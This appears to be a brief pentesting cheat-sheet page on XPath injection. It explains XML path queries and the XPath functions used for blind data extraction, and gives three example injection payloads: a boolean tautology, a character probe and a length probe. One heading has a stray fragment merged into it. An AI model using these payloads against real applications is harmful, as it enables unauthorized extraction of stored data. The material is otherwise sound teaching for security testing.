../xml-injection

XML / XPath

Concept

Data is stored in an XML File

<group>
    <element>
        <attribute1>...</attribute1>
        <attribute2>...</attribute2>
        <attribute3>...</attribute3>
    </element>
    <element>
        ...
    </element>
    <element>
        ...
    </element>
</group>

And the request are made like this :

/group/element[1]/attribute1

You can trigger it with some payload

and then when you have triggered it you can perform test using function :

contains([string],[substring])
name([path])
substring([string],min,max)
string-length([string])

The string can be called by the path and you can get there name with the function. and if you don’t know the name of an element you can use * like in regex

Example of payload

test if exploitable structure

invalid' or true()

test if first char is asubstring([string],min,max)

invalid' or substring(/*[1],1,1)='a'

test if there’s content

invalid' or string-length(/group/element[2]/attribute1)>=1

Ressources

Payloads